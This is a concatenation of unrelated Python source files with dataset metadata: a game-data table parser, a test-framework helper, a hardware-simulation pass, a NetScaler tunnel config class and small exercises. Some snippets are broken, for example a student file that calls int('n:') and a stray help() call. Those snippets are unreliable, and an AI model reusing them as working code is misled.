category=Dungeon.CATEGORY_SCENARIO,
)
if created:
print(f'Added new dungeon {dungeon.name} - {dungeon.slug}')
# Update (or create) the scenario level
difficulty = int(row['difficulty'])
stage = int(row['stage no'])
energy_cost = int(row['energy cost'])
slots = int(row['player unit slot'])
level, created = Level.objects.update_or_create(
dungeon=dungeon,
difficulty=difficulty,
floor=stage,
energy_cost=energy_cost,
frontline_slots=slots,
backline_slots=None,
total_slots=slots,
)
if created:
print(f'Added new level for {dungeon.name} - {level.get_difficulty_display()} B{stage}')
def _get_scenario_names_by_id():
# Assemble scenario-only names from world map table to match the 'region id' in SCENARIOS localvalue table
world_map_names = _get_translation_tables()[TranslationTables.WORLD_MAP_DUNGEON_NAMES]
world_map_table = _get_localvalue_tables(LocalvalueTables.WORLD_MAP)
scenario_table = [
val for val in world_map_table['rows'] if int(val['type']) == 3
]
return {
scen_id + 1: world_map_names[int(scenario_data['world id'])] for scen_id, scenario_data in enumerate(scenario_table)
}
def parse_cairos_dungeons():
dungeon_names = _get_translation_tables()[TranslationTables.CAIROS_DUNGEON_NAMES]
with open('bestiary/com2us_data/dungeon_list.json', 'r') as f:
for dungeon_data in json.load(f):
group_id = dungeon_data['group_id']
dungeon_id = dungeon_data['dungeon_id']
name = dungeon_names[group_id]
dungeon, created = Dungeon.objects.update_or_create(
com2us_id=dungeon_id,
name=name,
category=Dungeon.CATEGORY_CAIROS,
)
if created:
print(f'Added new dungeon {dungeon.name} - {dungeon.slug}')
# Create levels
for level_data in dungeon_data['stage_list']:
stage = int(level_data['stage_id'])
energy_cost = int(level_data['cost'])
slots = 5
level, created = Level.objects.update_or_create(
dungeon=dungeon,
floor=stage,
energy_cost=energy_cost,
frontline_slots=slots,
backline_slots=None,
total_slots=slots,
)
if created:
print(f'Added new level for {dungeon.name} - {level.get_difficulty_display() if level.difficulty is not None else ""} B{stage}')
def parse_secret_dungeons():
dungeon_table = _get_localvalue_tables(LocalvalueTables.SECRET_DUNGEONS)
for row in dungeon_table['rows']:
dungeon_id = int(row['instance id'])
monster_id = int(row['summon pieces'])
monster = Monster.objects.get(com2us_id=monster_id)
dungeon, created = SecretDungeon.objects.update_or_create(
com2us_id=dungeon_id,
name=f'{monster.get_element_display()} {monster.name} Secret Dungeon',
category=SecretDungeon.CATEGORY_SECRET,
monster=monster,
)
if created:
print(f'Added new secret dungeon {dungeon.name} - {dungeon.slug}')
# Create a single level referencing this dungeon
level, created = Level.objects.update_or_create(
dungeon=dungeon,
floor=1,
energy_cost=3,
frontline_slots=5,
backline_slots=None,
total_slots=5,
)
if created:
print(f'Added new level for {dungeon.name} - {level.get_difficulty_display() if level.difficulty is not None else ""} B{1}')
def parse_elemental_rift_dungeons():
dungeon_table = _get_localvalue_tables(LocalvalueTables.ELEMENTAL_RIFT_DUNGEONS)
monster_names = _get_translation_tables()[TranslationTables.MONSTER_NAMES]
for row in dungeon_table['rows']:
if int(row['enable']):
dungeon_id = int(row['master id'])
name = monster_names[int(row['unit id'])].strip()
dungeon, created = Dungeon.objects.update_or_create(
com2us_id=dungeon_id,
name=name,
category=Dungeon.CATEGORY_RIFT_OF_WORLDS_BEASTS,
)
if created:
print(f'Added new dungeon {dungeon.name} - {dungeon.slug}')
# Create a single level referencing this dungeon
level, created = Level.objects.update_or_create(
dungeon=dungeon,
floor=1,
energy_cost=int(row['cost energy']),
frontline_slots=4,
backline_slots=4,
total_slots=6,
)
if created:
print(f'Added new level for {dungeon.name} - {level.get_difficulty_display() if level.difficulty is not None else ""} B{1}')
def parse_rift_raid():
raid_table = _get_localvalue_tables(LocalvalueTables.RIFT_RAIDS)
for row in raid_table['rows']:
raid_id = int(row['raid id'])
dungeon, created = Dungeon.objects.update_or_create(
com2us_id=raid_id,
name='Rift Raid',
category=Dungeon.CATEGORY_RIFT_OF_WORLDS_RAID,
)
if created:
print(f'Added new dungeon {dungeon.name} - {dungeon.slug}')
level, created = Level.objects.update_or_create(
dungeon=dungeon,
floor=int(row['stage id']),
energy_cost=int(row['cost energy']),
frontline_slots=4,
backline_slots=4,
total_slots=6,
)
if created:
print(f'Added new level for {dungeon.name} - {level.get_difficulty_display() if level.difficulty is not None else ""} B{1}')
def save_translation_tables():
tables = _get_translation_tables()
with open('bestiary/com2us_data/text_eng.csv', 'w', encoding='utf-8') as f:
writer = csv.writer(f)
writer.writerow(['table_num', 'id', 'text'])
for table_idx, table in enumerate(tables):
for key, text in table.items():
writer.writerow([table_idx, key, text.strip()])
def _get_translation_tables():
raw = ConstBitStream(filename='bestiary/com2us_data/text_eng.dat')
tables = []
table_ver = raw.read('intle:32')
print(f'Translation table version {table_ver}')
try:
while True:
table_len = raw.read('intle:32')
table = {}
for _ in range(table_len):
str_id, str_len = raw.readlist('intle:32, intle:32')
parsed_str = binascii.a2b_hex(raw.read('hex:{}'.format(str_len * 8))[:-4])
table[str_id] = parsed_str.decode("utf-8")
tables.append(table)
except ReadError:
# EOF
pass
return tables
class LocalvalueTables(IntEnum):
WIZARD_XP_REQUIREMENTS = 1
SKY_ISLANDS = 2
BUILDINGS = 3
DECORATIONS = 4
OBSTACLES = 5
MONSTERS = 6
MONSTER_LEVELING = 7
# Unknown table 8 - some sort of effect mapping
SKILL_EFFECTS = 9
SKILLS = 10
SUMMON_METHODS = 11
RUNE_SET_DEFINITIONS = 12
NPC_ARENA_RIVALS = 13
ACHIEVEMENTS = 14
TUTORIALS = 15
SCENARIO_BOSSES = 16
SCENARIO_LEVELS = 17
CAIROS_BOSS_INTROS = 18
# Unknown table 19 - more effect mapping
WORLD_MAP = 20
ARENA_RANKS = 21
MONTHLY_REWARDS = 22
CAIROS_DUNGEON_LIST = 23
INVITE_FRIEND_REWARDS_OLD = 24
# Unknown table 25 - probably x/y positions of 3d models in dungeons/scenarios
AWAKENING_ESSENCES = 26
ACCOUNT_BOOSTS = 27 # XP boost, mana boost, etc
ARENA_WIN_STREAK_BONUSES = 28
CHAT_BANNED_WORDS = 29
IFRIT_SUMMON_ITEM = 30
SECRET_DUNGEONS = 31
SECRET_DUNGEON_ENEMIES = 32
PURCHASEABLE_ITEMS = 33
DAILY_MISSIONS = 34
VARIOUS_CONSTANTS = 35
MONSTER_POWER_UP_COSTS = 36
RUNE_UNEQUIP_COSTS = 37
RUNE_UPGRADE_COSTS_AND_CHANCES = 38
SCENARIO_REGIONS = 39
PURCHASEABLE_ITEMS2 = 40
# Unknown table 41 - scroll/cost related?
MAIL_ITEMS = 42
# Unknown table 43 - angelmon reward sequences?
MONSTER_FUSION_RECIPES_OLD = 44
TOA_REWARDS = 45
MONSTER_FUSION_RECIPES = 46
TOA_FLOOR_MODELS_AND_EFFECTS = 47
ELLIA_COSTUMES = 48
GUILD_LEVELS = 49 # Unimplemented in-game
GUILD_BONUSES = 50 # Unimplemented in-game
RUNE_STAT_VALUES = 51
GUILD_RANKS = 52
GUILD_UNASPECTED_SUMMON_PIECES = 53 # Ifrit and Cowgirl pieces
# Unknown table 54 - possible rune crafting or package
MONSTER_TRANSMOGS = 55
ELEMENTAL_RIFT_DUNGEONS = 56
WORLD_BOSS_SCRIPT = 57
WORLD_BOSS_ELEMENTAL_ADVANTAGES = 58
WORLD_BOSS_FIGHT_RANKS = 59
WORLD_BOSS_PLAYER_RANKS = 60
SKILL_TRANSMOGS = 61
ENCHANT_GEMS = 62
GRINDSTONES = 63
RUNE_CRAFT_APPLY_COSTS = 64
RIFT_RAIDS = 65
# Unknown table 66 - some sort of reward related
ELLIA_COSTUME_ITEMS = 67
CHAT_BANNED_WORDS2 = 68
CHAT_BANNED_WORDS3 = 69
CHAT_BANNED_WORDS4 = 70
CRAFT_MATERIALS = 71
HOMUNCULUS_SKILL_TREES = 72
HOMUNCULUS_CRAFT_COSTS = 73
ELEMENTAL_DAMAGE_RANKS = 74
WORLD_ARENA_RANKS = 75
WORLD_ARENA_SHOP_ITEMS = 76
CHAT_BANNED_WORDS5 = 77
CHAT_BANNED_WORDS6 = 78
CHAT_BANNED_WORDS7 = 79
CHAT_BANNED_WORDS8 = 80
ARENA_CHOICE_UI = 81
IFRIT_TRANSMOGS = 82
# Unknown table 83 - value lists related to game version
CHALLENGES = 84
# Unknown table 85 - some sort of rules
WORLD_ARENA_SEASON_REWARDS = 86
WORLD_ARENA_RANKS2 = 87
WORLD_ARENA_REWARD_LIST = 88
GUILD_SIEGE_MAP = 89
GUILD_SIEGE_REWARD_BOXES = 90
GUILD_SIEGE_RANKINGS = 91
def save_localvalue_tables():
for x in range(1,99):
table = _get_localvalue_tables(x)
with open(f'bestiary/com2us_data/localvalue_{x}.csv', 'w', encoding='utf-8') as f:
writer = csv.DictWriter(f, fieldnames=table['header'])
writer.writeheader()
for row in table['rows']:
writer.writerow(row)
def _decrypt_localvalue_dat():
with open('bestiary/com2us_data/localvalue.dat') as f:
return decrypt_response(f.read().strip('\0'))
def _get_localvalue_tables(table_id):
tables = {}
decrypted_localvalue = _decrypt_localvalue_dat()
raw = ConstBitStream(decrypted_localvalue)
raw.read('pad:{}'.format(0x24 * 8))
num_tables = raw.read('intle:32') - 1
raw.read('pad:{}'.format(0xc * 8))
if num_tables > int(max(LocalvalueTables)):
print('WARNING! Found {} tables in localvalue.dat. There are only {} tables defined!'.format(num_tables, int(max(LocalvalueTables))))
# Read the locations of all defined tables
for x in range(0, num_tables):
table_num, start, end = raw.readlist(['intle:32']*3)
tables[table_num] = {
'start': start,
'end': end
}
# Record where we are now, as that is the offset of where the first table starts
table_start_offset = int(raw.pos / 8)
# Load the requested table and return it
raw = ConstBitStream(decrypted_localvalue)
table_data = {
'header': [],
'rows': []
}
raw.read('pad:{}'.format((table_start_offset + tables[table_id]['start']) * 8))
table_str = raw.read('bytes:{}'.format(tables[table_id]['end'] - tables[table_id]['start'])).decode('utf-8').strip()
table_rows = table_str.split('\r\n')
table_data['header'] = table_rows[0].split('\t')
table_data['rows'] = [{table_data['header'][col]: value for col, value in enumerate(row.split('\t'))} for row in table_rows[1:]]
return table_data
| [
"peter@porksmash.com"
] | peter@porksmash.com |
f800f8822a575845596e69e4820327b694eb29c9 | 98dffa1d08cd2f7242650bb9eeacae42f6368300 | /scripting/layering.py | 4b4a6c016cf873d9c2462f7e3f1f67ad3ae0cb1f | [] | no_license | ucll-scripting/testing-framework | 01c93c666070776e75f63f647f125ecdeb49dc91 | 68452b00d25484d48af3087486b295d9f595a000 | refs/heads/master | 2023-02-26T01:22:06.326330 | 2021-02-02T14:47:47 | 2021-02-02T14:47:47 | 335,320,727 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,584 | py | from contextlib import contextmanager
from scripting.dynamic import create_dynamic_variable, dynamic_bind
from scripting.testing import observers, skip_if
@contextmanager
def _layered_observers(counter, on_pass=None, on_fail=None, on_skip=None):
observer_layer = counter.value
def wrap(f):
def observer(*args):
if counter.value == observer_layer:
f(*args)
return observer
on_pass = wrap(on_pass) if on_pass else None
on_fail = wrap(on_fail) if on_fail else None
on_skip = wrap(on_skip) if on_skip else None
with observers(on_pass=on_pass, on_fail=on_fail, on_skip=on_skip):
yield
@contextmanager
def _layered_skip_if(counter, skip_if):
observer_layer = counter.value
def wrap(f):
def wrapped(*args):
if counter.value == observer_layer:
return f(*args)
else:
return False
return wrapped
with skip_if(wrap(skip_if)):
yield
@contextmanager
def _add_layer(counter):
with dynamic_bind(counter, counter.value + 1):
yield
class _Layering:
def __init__(self):
self.__counter = create_dynamic_variable().bind(0)
def add(self):
return _add_layer(self.__counter)
def observers(self, on_pass=None, on_fail=None, on_skip=None):
return _layered_observers(self.__counter, on_pass=on_pass, on_fail=on_fail, on_skip=on_skip)
def skip_if(self, predicate):
return _layered_skip_if(self.__counter, predicate)
def create_layering():
return _Layering()
| [
"frederic.vogels@ucll.be"
] | frederic.vogels@ucll.be |
c081ccf7cbea4d0b4ab68487450cb1e471fe4399 | bf8870d923adca9877d4b4dacef67f0a454727a8 | /codeforces.com/contest/630/a/pr.py | 1c045061b50ebd8695eb0529af14d00a18b26d2c | [] | no_license | artkpv/code-dojo | 6f35a785ee5ef826e0c2188b752134fb197b3082 | 0c9d37841e7fc206a2481e4640e1a024977c04c4 | refs/heads/master | 2023-02-08T22:55:07.393522 | 2023-01-26T16:43:33 | 2023-01-26T16:43:33 | 158,388,327 | 1 | 0 | null | 2023-01-26T08:39:46 | 2018-11-20T12:45:44 | C# | UTF-8 | Python | false | false | 95 | py | print(25)
input()
help()
l = set()
def foo2(p0, p3, p1=1, p2="abc"):
pass
foo2(1, 2)
| [
"artyomkarpov@gmail.com"
] | artyomkarpov@gmail.com |
9096a6363c0b799ebf47452ce695152375b0105e | 28ddc330bbfcebf3ce7d75643d06919ebed77f5f | /pymtl3/passes/WrapGreenletPass.py | c9b5bb8eee1e267730648dec2db763dff65ae88e | [
"BSD-3-Clause"
] | permissive | hsqforfun/pymtl3 | 848d642abcf539688750f4b26e93133191a88bae | 05e06601cf262a663a95d1235cb99056ece84580 | refs/heads/master | 2020-09-01T15:15:27.891486 | 2019-10-31T23:42:59 | 2019-10-31T23:42:59 | 218,990,327 | 1 | 0 | BSD-3-Clause | 2019-11-01T13:27:04 | 2019-11-01T13:27:03 | null | UTF-8 | Python | false | false | 1,816 | py | """
========================================================================
WrapGreenletPass.py
========================================================================
Wrap all update blocks that call methods with blocking decorator with
greenlet.
Author : Shunning Jiang
Date : May 20, 2019
"""
from graphviz import Digraph
from greenlet import greenlet
from pymtl3.dsl.errors import UpblkCyclicError
from .BasePass import BasePass
from .errors import PassOrderError
class WrapGreenletPass( BasePass ):
def __call__( self, top ):
if not hasattr( top, "_dag" ):
raise PassOrderError( "_dag" )
self.wrap_greenlet( top )
def wrap_greenlet( self, top ):
all_upblks = top._dag.final_upblks
all_constraints = top._dag.all_constraints
greenlet_upblks = top._dag.greenlet_upblks
if not greenlet_upblks:
return
def wrap_greenlet( blk ):
def greenlet_wrapper():
while True:
blk()
greenlet.getcurrent().parent.switch()
gl = greenlet( greenlet_wrapper )
def greenlet_ticker():
gl.switch()
# greenlet_ticker.greenlet = gl
greenlet_ticker.__name__ = blk.__name__
return greenlet_ticker
new_upblks = set()
wrapped_blk_mapping = {}
for blk in all_upblks:
if blk in greenlet_upblks:
wrapped = wrap_greenlet( blk )
wrapped_blk_mapping[ blk ] = wrapped
new_upblks.add( wrapped )
else:
new_upblks.add( blk )
new_constraints = set()
for (x, y) in all_constraints:
if x in greenlet_upblks:
x = wrapped_blk_mapping[ x ]
if y in greenlet_upblks:
y = wrapped_blk_mapping[ y ]
new_constraints.add( (x, y) )
top._dag.final_upblks = new_upblks
top._dag.all_constraints = new_constraints
| [
"sj634@cornell.edu"
] | sj634@cornell.edu |
b633d59df92330c4c250a5e2819100d322277041 | aa1e637de90f69f9ae742d42d5b777421617d10c | /nitro/resource/config/network/iptunnel.py | 9befd5abeab9ba2d3985b199b3dcc42e2d22188e | [
"Apache-2.0",
"Python-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | km0420j/nitro-python | db7fcb49fcad3e7a1ae0a99e4fc8675665da29ba | d03eb11f492a35a2a8b2a140322fbce22d25a8f7 | refs/heads/master | 2021-10-21T18:12:50.218465 | 2019-03-05T14:00:15 | 2019-03-05T15:35:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,031 | py | #
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nitro.resource.base.base_resource import base_resource
from nitro.resource.base.base_resource import base_response
from nitro.service.options import options
from nitro.exception.nitro_exception import nitro_exception
from nitro.util.nitro_util import nitro_util
class iptunnel(base_resource) :
"""Configuration for ip Tunnel resource."""
def __init__(self) :
self._name = ""
self._remote = ""
self._remotesubnetmask = ""
self._local = ""
self._protocol = ""
self._grepayload = ""
self._ipsecprofilename = ""
self._vlan = 0
self._ownergroup = ""
self._sysname = ""
self._type = 0
self._encapip = ""
self._channel = 0
self._tunneltype = []
self._ipsectunnelstatus = ""
self._pbrname = ""
self.___count = 0
@property
def name(self) :
"""Name for the IP tunnel. Leading character must be a number or letter. Other characters allowed, after the first character, are @ _ - . (period) : (colon) # and space ( ).<br/>Minimum length = 1."""
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
"""Name for the IP tunnel. Leading character must be a number or letter. Other characters allowed, after the first character, are @ _ - . (period) : (colon) # and space ( ).<br/>Minimum length = 1
:param name:
"""
try :
self._name = name
except Exception as e:
raise e
@property
def remote(self) :
"""Public IPv4 address, of the remote device, used to set up the tunnel. For this parameter, you can alternatively specify a network address.<br/>Minimum length = 1."""
try :
return self._remote
except Exception as e:
raise e
@remote.setter
def remote(self, remote) :
"""Public IPv4 address, of the remote device, used to set up the tunnel. For this parameter, you can alternatively specify a network address.<br/>Minimum length = 1
:param remote:
"""
try :
self._remote = remote
except Exception as e:
raise e
@property
def remotesubnetmask(self) :
"""Subnet mask of the remote IP address of the tunnel."""
try :
return self._remotesubnetmask
except Exception as e:
raise e
@remotesubnetmask.setter
def remotesubnetmask(self, remotesubnetmask) :
"""Subnet mask of the remote IP address of the tunnel.
:param remotesubnetmask:
"""
try :
self._remotesubnetmask = remotesubnetmask
except Exception as e:
raise e
@property
def local(self) :
"""Type ofNetScaler owned public IPv4 address, configured on the local NetScaler appliance and used to set up the tunnel."""
try :
return self._local
except Exception as e:
raise e
@local.setter
def local(self, local) :
"""Type ofNetScaler owned public IPv4 address, configured on the local NetScaler appliance and used to set up the tunnel.
:param local:
"""
try :
self._local = local
except Exception as e:
raise e
@property
def protocol(self) :
"""Name of the protocol to be used on this tunnel.<br/>Default value: IPIP<br/>Possible values = IPIP, GRE, IPSEC, VXLAN."""
try :
return self._protocol
except Exception as e:
raise e
@protocol.setter
def protocol(self, protocol) :
"""Name of the protocol to be used on this tunnel.<br/>Default value: IPIP<br/>Possible values = IPIP, GRE, IPSEC, VXLAN
:param protocol:
"""
try :
self._protocol = protocol
except Exception as e:
raise e
@property
def grepayload(self) :
"""The payload GRE will carry.<br/>Default value: ETHERNETwithDOT1Q<br/>Possible values = ETHERNETwithDOT1Q, ETHERNET, IP."""
try :
return self._grepayload
except Exception as e:
raise e
@grepayload.setter
def grepayload(self, grepayload) :
"""The payload GRE will carry.<br/>Default value: ETHERNETwithDOT1Q<br/>Possible values = ETHERNETwithDOT1Q, ETHERNET, IP
:param grepayload:
"""
try :
self._grepayload = grepayload
except Exception as e:
raise e
@property
def ipsecprofilename(self) :
"""Name of IPSec profile to be associated.<br/>Default value: "ns_ipsec_default_profile"."""
try :
return self._ipsecprofilename
except Exception as e:
raise e
@ipsecprofilename.setter
def ipsecprofilename(self, ipsecprofilename) :
"""Name of IPSec profile to be associated.<br/>Default value: "ns_ipsec_default_profile"
:param ipsecprofilename:
"""
try :
self._ipsecprofilename = ipsecprofilename
except Exception as e:
raise e
@property
def vlan(self) :
"""The vlan for mulicast packets.<br/>Minimum length = 1<br/>Maximum length = 4094."""
try :
return self._vlan
except Exception as e:
raise e
@vlan.setter
def vlan(self, vlan) :
"""The vlan for mulicast packets.<br/>Minimum length = 1<br/>Maximum length = 4094
:param vlan:
"""
try :
self._vlan = vlan
except Exception as e:
raise e
@property
def ownergroup(self) :
"""The owner node group in a Cluster for the iptunnel.<br/>Default value: DEFAULT_NG<br/>Minimum length = 1."""
try :
return self._ownergroup
except Exception as e:
raise e
@ownergroup.setter
def ownergroup(self, ownergroup) :
"""The owner node group in a Cluster for the iptunnel.<br/>Default value: DEFAULT_NG<br/>Minimum length = 1
:param ownergroup:
"""
try :
self._ownergroup = ownergroup
except Exception as e:
raise e
@property
def sysname(self) :
"""The name of the ip tunnel."""
try :
return self._sysname
except Exception as e:
raise e
@property
def type(self) :
"""The type of this tunnel."""
try :
return self._type
except Exception as e:
raise e
@property
def encapip(self) :
"""The effective local IP address of the tunnel. Used as the source of the encapsulated packets."""
try :
return self._encapip
except Exception as e:
raise e
@property
def channel(self) :
"""The tunnel that is bound to a netbridge."""
try :
return self._channel
except Exception as e:
raise e
@property
def tunneltype(self) :
"""Indicates that a tunnel is User-Configured, Internal or DELETE-IN-PROGRESS.<br/>Possible values = Configured, Delete-In-Progress."""
try :
return self._tunneltype
except Exception as e:
raise e
@property
def ipsectunnelstatus(self) :
"""Whether the ipsec on this tunnel is up or down.<br/>Possible values = DOWN, UP, PARTIAL-UP, UNKNOWN."""
try :
return self._ipsectunnelstatus
except Exception as e:
raise e
@property
def pbrname(self) :
"""Name for the PBR."""
try :
return self._pbrname
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
"""converts nitro response into object and returns the object array in case of get request.
:param service:
:param response:
"""
try :
result = service.payload_formatter.string_to_resource(iptunnel_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.iptunnel
except Exception as e :
raise e
def _get_object_name(self) :
"""Returns the value of object identifier argument"""
try :
if self.name is not None :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def add(cls, client, resource) :
"""Use this API to add iptunnel.
:param client:
:param resource:
"""
try :
if type(resource) is not list :
addresource = iptunnel()
addresource.name = resource.name
addresource.remote = resource.remote
addresource.remotesubnetmask = resource.remotesubnetmask
addresource.local = resource.local
addresource.protocol = resource.protocol
addresource.grepayload = resource.grepayload
addresource.ipsecprofilename = resource.ipsecprofilename
addresource.vlan = resource.vlan
addresource.ownergroup = resource.ownergroup
return addresource.add_resource(client)
else :
if (resource and len(resource) > 0) :
addresources = [ iptunnel() for _ in range(len(resource))]
for i in range(len(resource)) :
addresources[i].name = resource[i].name
addresources[i].remote = resource[i].remote
addresources[i].remotesubnetmask = resource[i].remotesubnetmask
addresources[i].local = resource[i].local
addresources[i].protocol = resource[i].protocol
addresources[i].grepayload = resource[i].grepayload
addresources[i].ipsecprofilename = resource[i].ipsecprofilename
addresources[i].vlan = resource[i].vlan
addresources[i].ownergroup = resource[i].ownergroup
result = cls.add_bulk_request(client, addresources)
return result
except Exception as e :
raise e
@classmethod
def delete(cls, client, resource) :
"""Use this API to delete iptunnel.
:param client:
:param resource:
"""
try :
if type(resource) is not list :
deleteresource = iptunnel()
if type(resource) != type(deleteresource):
deleteresource.name = resource
else :
deleteresource.name = resource.name
return deleteresource.delete_resource(client)
else :
if type(resource[0]) != cls :
if (resource and len(resource) > 0) :
deleteresources = [ iptunnel() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].name = resource[i]
else :
if (resource and len(resource) > 0) :
deleteresources = [ iptunnel() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].name = resource[i].name
result = cls.delete_bulk_request(client, deleteresources)
return result
except Exception as e :
raise e
@classmethod
def get(cls, client, name="", option_="") :
"""Use this API to fetch all the iptunnel resources that are configured on netscaler.
:param client:
:param name: (Default value = "")
:param option_: (Default value = "")
"""
try :
if not name :
obj = iptunnel()
response = obj.get_resources(client, option_)
else :
if type(name) != cls :
if type(name) is not list :
obj = iptunnel()
obj.name = name
response = obj.get_resource(client, option_)
else :
if name and len(name) > 0 :
response = [iptunnel() for _ in range(len(name))]
obj = [iptunnel() for _ in range(len(name))]
for i in range(len(name)) :
obj[i] = iptunnel()
obj[i].name = name[i]
response[i] = obj[i].get_resource(client, option_)
return response
except Exception as e :
raise e
@classmethod
def get_args(cls, client, args) :
"""Use this API to fetch all the iptunnel resources that are configured on netscaler.
# This uses iptunnel_args which is a way to provide additional arguments while fetching the resources.
:param client:
:param args:
"""
try :
obj = iptunnel()
option_ = options()
option_.args = nitro_util.object_to_string_withoutquotes(args)
response = obj.get_resources(client, option_)
return response
except Exception as e :
raise e
@classmethod
def get_filtered(cls, client, filter_) :
"""Use this API to fetch filtered set of iptunnel resources.
filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
:param client:
:param filter_:
"""
try :
obj = iptunnel()
option_ = options()
option_.filter = filter_
response = obj.getfiltered(client, option_)
return response
except Exception as e :
raise e
@classmethod
def count(cls, client) :
"""Use this API to count the iptunnel resources configured on NetScaler.
:param client:
"""
try :
obj = iptunnel()
option_ = options()
option_.count = True
response = obj.get_resources(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
@classmethod
def count_filtered(cls, client, filter_) :
"""Use this API to count filtered the set of iptunnel resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
:param client:
:param filter_:
"""
try :
obj = iptunnel()
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
class Protocol:
""" """
IPIP = "IPIP"
GRE = "GRE"
IPSEC = "IPSEC"
VXLAN = "VXLAN"
class Tunneltype:
""" """
Configured = "Configured"
Delete_In_Progress = "Delete-In-Progress"
class Ipsectunnelstatus:
""" """
DOWN = "DOWN"
UP = "UP"
PARTIAL_UP = "PARTIAL-UP"
UNKNOWN = "UNKNOWN"
class Grepayload:
""" """
ETHERNETwithDOT1Q = "ETHERNETwithDOT1Q"
ETHERNET = "ETHERNET"
IP = "IP"
class iptunnel_response(base_response) :
""" """
def __init__(self, length=1) :
self.iptunnel = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.iptunnel = [iptunnel() for _ in range(length)]
| [
"lennart.weller@hansemerkur.de"
] | lennart.weller@hansemerkur.de |
a8400b17416c685d35835321143d2a02eb4e838b | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/59/usersdata/222/40577/submittedfiles/testes.py | 1db880d83fe690190078250959ae8a1407242aa4 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 114 | py | # -*- coding: utf-8 -*-
n=int('n:')
i=1
cont=0
while i<n:
if i%2==1:
cont=cont+1
i=i+1
print(cont) | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
3959ec371c5fcdf95fc0d3374d91d8402a7200ed | 3e50ed55208122b2f8b34e7f26f33c9ef70efce5 | /python/distributed_spider/distributed_spider/spiders/add_task.py | c98dc6dadbbf75c65779f451818ce7992048148c | [] | no_license | brady-wang/mac_home | b8343da428a4e6696b89d0e6a53ff0dfc87ffd21 | c56a739c31d3c0f62d26d8512fe1a90c036a1f96 | refs/heads/master | 2023-01-14T11:42:02.544322 | 2019-10-02T11:47:27 | 2019-10-02T11:47:27 | 193,177,718 | 0 | 0 | null | 2023-01-04T13:55:31 | 2019-06-22T01:27:10 | PHP | UTF-8 | Python | false | false | 321 | py | # -*- coding: utf-8 -*-
import scrapy
import redis
url = "https://www.pexels.com/photo/aerial-photo-of-high-rise-building-754587/"
url1 = "https://www.pexels.com/photo/waterfalls-688559/"
rds = redis.StrictRedis(host='192.168.33.10',port='6379')
# res = rds.rpush('yeves:urls',url)
# res = rds.rpush('yeves:urls',url1)
| [
"brady.wang@qq.com"
] | brady.wang@qq.com |
3db0a0d16fc6a8444278c81119ea8a2c2070ac2c | 466660115eafd99b72f81339d86c5bcbf4c7efb0 | /codes/12/opencv_warpPerspective_demo.py | 8cec5184ed3d80d675d2deace8ff2ccd3a81d8d2 | [] | no_license | CoryVegan/scipybook2 | c2bb68c169c632ab389600034beb33ac921b0ba1 | a8fd295c2f2d7ee18f351e5622ca7eeb4649ee50 | refs/heads/master | 2020-03-23T14:50:28.056482 | 2017-08-25T06:00:00 | 2018-06-02T14:18:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,257 | py | # -*- coding: utf-8 -*-
"""
透视变换
"""
import pyopencv as cv
import numpy as np
from enthought.traits.api import HasTraits, Array
from enthought.traits.ui.api import View, Item
class PerspectiveDemo(HasTraits):
src = Array(shape=(4,2), dtype=np.float32)
dst = Array(shape=(4,2), dtype=np.float32)
View = View(
Item("dst", label="变换后坐标"),
title = "Perspective Demo控制面板"
)
def __init__(self, **traits):
super(PerspectiveDemo, self).__init__(**traits)
self.img = cv.imread("lena.jpg")
w = self.img.size().width
h = self.img.size().height
self.src = np.array([[0,0],[w,0],[0,h],[w,h]],dtype=np.float32)
self.dst = np.array([[0,0],[w,0],[0,h],[w,h]],dtype=np.float32)
self.on_trait_change(self.redraw, "src,dst")
self.redraw()
def redraw(self):
src = cv.asvector_Point2f(self.src)
dst = cv.asvector_Point2f(self.dst)
m = cv.getPerspectiveTransform(src, dst)
print(m)
img2 = cv.Mat()
cv.warpPerspective(self.img, img2, m, self.img.size())
cv.imshow("Perspective Demo", img2)
cv.namedWindow("Perspective Demo")
demo = PerspectiveDemo()
demo.configure_traits() | [
"qytang326@gmail.com"
] | qytang326@gmail.com |
